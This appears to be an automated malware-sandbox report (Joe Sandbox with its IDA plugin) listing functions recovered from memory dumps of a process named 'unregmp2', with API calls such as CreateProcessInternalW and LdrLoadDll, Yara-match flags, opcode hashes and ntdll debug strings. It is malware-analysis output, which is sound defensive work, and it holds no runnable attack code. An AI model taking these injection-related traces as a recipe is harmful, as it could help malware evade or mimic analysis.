                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Initialize
                  • String ID: @J7<
                  • API String ID: 2538663250-2016760708
                  • Opcode ID: 5ce6dcf617c5f06965163bde57df42a3b2a15ec3d3217ad3b8d92d4294f82889
                  • Instruction ID: 0e0cc257355f7b48f4901b5a97282adec8a7aa8e8c44670221e7faab889c4364
                  • Opcode Fuzzy Hash: 5ce6dcf617c5f06965163bde57df42a3b2a15ec3d3217ad3b8d92d4294f82889
                  • Instruction Fuzzy Hash: 5A313EB5A1060AAFDB00DFD8D8809EEB7B9FF88304B148599E515AB314D771EE058BA0
                  Function 00BD4410 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00BD4482
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
                  • Instruction ID: 76a04340122ff8e00ff5b45e2d6dab225abb00025b9d17884706dabd7bf53c6c
                  • Opcode Fuzzy Hash: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
                  • Instruction Fuzzy Hash: 0D010CB5E4024DABDF10DAE5DC42F9EB7B89B54708F008195A91897241FB31EB588B91
                  Function 00BE83D0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,00BD7CE3,00000010,?,?,?,00000044,?,00000010,00BD7CE3,?,?,?), ref: 00BE8433
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID:
                  • API String ID: 2186235152-0
                  • Opcode ID: f5d22d67842d2450b27c3065ff42fba51732c5ca887623a77e2c9bf35b7c859c
                  • Instruction ID: 5267f9081e0f0c409c889f9c007c904cf469654e6cd85c0a4a7e9b70b1f59b9a
                  • Opcode Fuzzy Hash: f5d22d67842d2450b27c3065ff42fba51732c5ca887623a77e2c9bf35b7c859c
                  • Instruction Fuzzy Hash: F801C0B2201108BBCB48DE89DC81EEB77ADAF8D714F408108BA09E3241D631F9518BA4
                  Function 00BC9750 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00BC9795
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: 761c4c79b673f4af8e8a6f622ab2f12ea5dff2cd1a5a576294190b8fd4754503
                  • Instruction ID: d614d29a74448d8a0749750ee9f03efe80aaa6bce99d229166bf8df0d66212aa
                  • Opcode Fuzzy Hash: 761c4c79b673f4af8e8a6f622ab2f12ea5dff2cd1a5a576294190b8fd4754503
                  • Instruction Fuzzy Hash: 80F0303334121436E22065E99C02FD7769CCB81B61F140469F70CEA2C1DA96B90186A4
                  Function 00BC974B Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00BC9795
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: eeaae81f0b582460093ea9faca58f56e322993ab709f0aeb9a730b36c156ee7b
                  • Instruction ID: 8f65b7fe0d3822f579226557b2aefb8cce556938ea205c3e59214edaeb9febf0
                  • Opcode Fuzzy Hash: eeaae81f0b582460093ea9faca58f56e322993ab709f0aeb9a730b36c156ee7b
                  • Instruction Fuzzy Hash: C8E0923225030077F62076999C03FDB62C88F40B10F2004AAF718EF2C1DAA5B9414694
                  Function 00BE82F0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(00BD1659,?,00BE4C5B,00BD1659,00BE4657,00BE4C5B,?,00BD1659,00BE4657,00001000,?,?,00BE9BC0), ref: 00BE832F
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: e34e10abe938de23fd7b1e4c9f01118daf07397e550868144535cd1bcd6f19bf
                  • Instruction ID: 7f79b401dac4822e2a125ac85a2bd20da61c321ef638d5b2c2374e5dd1196061
                  • Opcode Fuzzy Hash: e34e10abe938de23fd7b1e4c9f01118daf07397e550868144535cd1bcd6f19bf
                  • Instruction Fuzzy Hash: 2CE06DB16012047BDA14EE59DC45F9B37ACEFC6710F504409F918A7242D671B9108BB4
                  Function 00BE8340 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,08E2C10E,00000007,00000000,00000004,00000000,00BD3CE6,000000F4,?,?,?,?,?), ref: 00BE837F
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: d5932aee73a0d6f69a1b071cec0428c5042f8ca814df286e9bbcf67385a24a0d
                  • Instruction ID: 1e06e4cae469632f1b5e5a2a95851d05b30beab39bb4532ad558039c5216ef6e
                  • Opcode Fuzzy Hash: d5932aee73a0d6f69a1b071cec0428c5042f8ca814df286e9bbcf67385a24a0d
                  • Instruction Fuzzy Hash: EFE065B26056487BD614EE5ADC41FDB33ACEFCA710F408409F908A7242CA71B9118BB5
                  Function 00BD7D20 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesW.KERNELBASE(?), ref: 00BD7D4C
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 3808e0d5ce3175fb2009888138a180ee8ca0d458d53aa132950fd60b491c031d
                  • Instruction ID: b66cab7676a30019c43dfbbb712cc86fb6fa87976fef0d3254b23e97b5cccc81
                  • Opcode Fuzzy Hash: 3808e0d5ce3175fb2009888138a180ee8ca0d458d53aa132950fd60b491c031d
                  • Instruction Fuzzy Hash: 2EE0D8711842041BE724B6689C41FB633888B44724F2405A4B91CCF2D1FD35F9018150
                  Function 00BD7B30 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNELBASE(00008003,?,?,00BD1940,00BE6D77,00BE4657,?), ref: 00BD7B63
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorMode
                  • String ID:
                  • API String ID: 2340568224-0
                  • Opcode ID: dfc5498256f3f42d30417f06aff1b8dcaf75e4f5e2812cd8907967518924d2f9
                  • Instruction ID: 27a66d07b392afc7e302e169b0b76dfa2cc9affb09a8473e69d4197ddb619c76
                  • Opcode Fuzzy Hash: dfc5498256f3f42d30417f06aff1b8dcaf75e4f5e2812cd8907967518924d2f9
                  • Instruction Fuzzy Hash: 35D05E716842047BE644E6A98C43F5A32CC8B00754F1444B9BA08EB3C2ED65F6108569
                  Function 00BD44A1 Relevance: 1.5, APIs: 1, Instructions: 15libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00BD4482
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: 673c8fe58901bd7f44c5f398775d49de7805e1f1010d5d71a948d0a6eebb35e1
                  • Instruction ID: 9a9ad566c66e36349e7d86266c85f4af840e851a31b025ca915464e6f4eaed4d
                  • Opcode Fuzzy Hash: 673c8fe58901bd7f44c5f398775d49de7805e1f1010d5d71a948d0a6eebb35e1
                  • Instruction Fuzzy Hash: D4D02B7668D10A8FC700CB6CD457748F7E4AB14304F0502C9CC945B750C63062C28B52
                  Function 04D42C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 5fce452350020e7aa177037fc5bf74a368d9c6f3a184604b498ae4ca2d2c722e
                  • Instruction ID: 8ff28907b7693777471f4955d3ddea94edc4ffd1dc5d5fb40cfe07634ecf9bdc
                  • Opcode Fuzzy Hash: 5fce452350020e7aa177037fc5bf74a368d9c6f3a184604b498ae4ca2d2c722e
                  • Instruction Fuzzy Hash: 78B09B719015C5C6FF11F760460971779107BD0745F15C061F2034752E4778D1D1F575

                  Non-executed Functions

                  Function 0502053E Relevance: .2, Instructions: 199COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.3780609960.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5020000_unregmp2.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3cec39893d6c948886090f3fad540364776a4f0ae7665075c8f9c425deac5524
                  • Instruction ID: 0704231de73d21d12183bf334bd1ee2f958acc4558786b7558dd4482a2fad848
                  • Opcode Fuzzy Hash: 3cec39893d6c948886090f3fad540364776a4f0ae7665075c8f9c425deac5524
                  • Instruction Fuzzy Hash: 6C51063061CB1D4FD768EF6DE0956BEB3E2FB98310F50492DD88AC3252DA74E8428785
                  Function 00BCE09E Relevance: .0, Instructions: 12COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 716480791c4d6f476667343191db59f7f387b16f2232a41d68afbde5e93be7a7
                  • Instruction ID: 508b329bf10e67f30fa856ce083a82e25b5865af5e37c5b2cdf2f350433552a3
                  • Opcode Fuzzy Hash: 716480791c4d6f476667343191db59f7f387b16f2232a41d68afbde5e93be7a7
                  • Instruction Fuzzy Hash: 48A00127FA501802D5245C4EB8812B8E3A8D3CB276E5032B7ED0CF76405497D8AA019D
                  Function 0502B94A Relevance: 56.5, Strings: 45, Instructions: 218COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3780609960.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5020000_unregmp2.jbxd
                  Similarity
                  • API ID:
                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                  • API String ID: 0-3558027158
                  • Opcode ID: 43eb559cd07aca5cdfbbe0671a38cd4b689c261cf601b04c2cae4e7dec51fbce
                  • Instruction ID: 90354a9ad26b3f0fe4a57479e7ea3255f0d45ad0d20a39346977994c87064d4a
                  • Opcode Fuzzy Hash: 43eb559cd07aca5cdfbbe0671a38cd4b689c261cf601b04c2cae4e7dec51fbce
                  • Instruction Fuzzy Hash: B99140F04082988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85
                  Function 04D42890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 670cf8d337e85692d215e72b2ebdf7b9ab69d9eeb0393ecf9f442a2f43c6b9bd
                  • Instruction ID: 83ec834e052fc021618a5b93c17eaa286e0b975614405c4c273ab1ab643a8c0b
                  • Opcode Fuzzy Hash: 670cf8d337e85692d215e72b2ebdf7b9ab69d9eeb0393ecf9f442a2f43c6b9bd
                  • Instruction Fuzzy Hash: 4351C6B6B00156BFDB10DF98889097EFBB8BB493447548269F4A5D7641E634FE408BE0
                  Function 04DB2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 2d14177f6d61effda3990b12f2b15924cafe418d5e809c8d2d287067dda12c94
                  • Instruction ID: ca551bfdae51ca590321d6c0fc43fe673a91a2df01302d718942890414e87bb0
                  • Opcode Fuzzy Hash: 2d14177f6d61effda3990b12f2b15924cafe418d5e809c8d2d287067dda12c94
                  • Instruction Fuzzy Hash: CF51F572B00645EBDB24DE5CCC989BFB7F9EB44304B4084AAE5D6D7641EA74FA4087A0
                  Function 04D37630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                  Download Yara Rule
                  Strings
                  • ExecuteOptions, xrefs: 04D746A0
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04D74742
                  • Execute=1, xrefs: 04D74713
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04D746FC
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04D74787
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04D74655
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04D74725
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID:
                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                  • API String ID: 0-484625025
                  • Opcode ID: 43622c85f5ec503b20d45a7f567c2bcbf5ede5d00bb42152373e888ae5e7f683
                  • Instruction ID: 9eb855e58627d86c2a5abbe12c21975db274012ea6cef3da382e48c07128b5b4
                  • Opcode Fuzzy Hash: 43622c85f5ec503b20d45a7f567c2bcbf5ede5d00bb42152373e888ae5e7f683
                  • Instruction Fuzzy Hash: 0151E3B17006197BEF21BBA5DCA5FBA73A9FB04305F1440A9E505A7190EB70FE45CE60
                  Function 04D4B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-$0$0
                  • API String ID: 1302938615-699404926
                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                  • Instruction ID: e781cbe7e10992699868382f6ceaf9c19816b5f83496c92804fec4b3df25d130
                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                  • Instruction Fuzzy Hash: 55818170E052499FDF24CF68C8917FEBBA2BFE5320F18455BD891AB291D634F8418B64
                  Function 04DB20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$[$]:%u
                  • API String ID: 48624451-2819853543
                  • Opcode ID: eecf0914e96f6f8e73ccdb57c113f4c47f63ed978f583d3c8882c11426ca1ca7
                  • Instruction ID: 007b21ece0b1e4acdaa26ad67767140da2157dc1d3e5ff5a3acaa9e746c3ebfb
                  • Opcode Fuzzy Hash: eecf0914e96f6f8e73ccdb57c113f4c47f63ed978f583d3c8882c11426ca1ca7
                  • Instruction Fuzzy Hash: 81213377A00119ABDB11DEA9DC54AEEB7F9EF54794F440166E945D3200E730E9028BE1
                  Function 04D2F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                  Download Yara Rule
                  Strings
                  • RTL: Re-Waiting, xrefs: 04D7031E
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D702BD
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D702E7
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                  • API String ID: 0-2474120054
                  • Opcode ID: 701f11ae786f94e1c9289a7d522b32a711f3b4540b5e29ef432f7ea837ea5399
                  • Instruction ID: a44fb950f2a237196f271fed35ad02ae2844336497d926e6b59b50c1166c0ccd
                  • Opcode Fuzzy Hash: 701f11ae786f94e1c9289a7d522b32a711f3b4540b5e29ef432f7ea837ea5399
                  • Instruction Fuzzy Hash: 71E1AA316087419FD725CF28C984B2AB7F0FB98728F140A6DF5A58B2E0E774E944DB52
                  Function 04D3BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                  Download Yara Rule
                  Strings
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04D77B7F
                  • RTL: Re-Waiting, xrefs: 04D77BAC
                  • RTL: Resource at %p, xrefs: 04D77B8E
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 0-871070163
                  • Opcode ID: 041930baf303d60f415f445a3e24be0a9f5ef97d02e0d4eec488008c0cd507b9
                  • Instruction ID: 05cddd16c0f362ace4598350cee5f355fb8f6192709005b26b9c564c1add85fa
                  • Opcode Fuzzy Hash: 041930baf303d60f415f445a3e24be0a9f5ef97d02e0d4eec488008c0cd507b9
                  • Instruction Fuzzy Hash: 5E41D3317057029FD724DE29C840B6AB7E5FF88725F100A2EF99ADB681EB31F4058B91
                  Function 04D3B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                  Download Yara Rule
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D7728C
                  Strings
                  • RTL: Re-Waiting, xrefs: 04D772C1
                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04D77294
                  • RTL: Resource at %p, xrefs: 04D772A3
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-605551621
                  • Opcode ID: 92baf85d734efae55e2b2b0f3bf531dd32c8d6ef14c2194f89aa82c053b64958
                  • Instruction ID: 3ddb005bfb317a8825926f7ed7151ed77bd4f7ed1a28c9a7161687dc83b531d1
                  • Opcode Fuzzy Hash: 92baf85d734efae55e2b2b0f3bf531dd32c8d6ef14c2194f89aa82c053b64958
                  • Instruction Fuzzy Hash: 1541D231700202ABDB21DE25CC41F66B7A5FB85719F140A1AFA95EB241EB21F8528BE1
                  Function 04DB2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: b664fb21da6e46d78b158f8c7cc7c38d9f349c8ee09f22849496f9f3a4478d26
                  • Instruction ID: 5e500045d76efd0d502e547cd14d2d5254493f5b32173057996e15a0a1b33703
                  • Opcode Fuzzy Hash: b664fb21da6e46d78b158f8c7cc7c38d9f349c8ee09f22849496f9f3a4478d26
                  • Instruction Fuzzy Hash: 68315772A00219DFDF60DE29DC44BEE77F8FB44754F84459AE889D3240EB30BA458BA1
                  Function 04D47D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-
                  • API String ID: 1302938615-2137968064
                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                  • Instruction ID: 819419f1f5d73294da594a6f519d67e227e72e2b72d93fa54a3d0ad55e995a86
                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
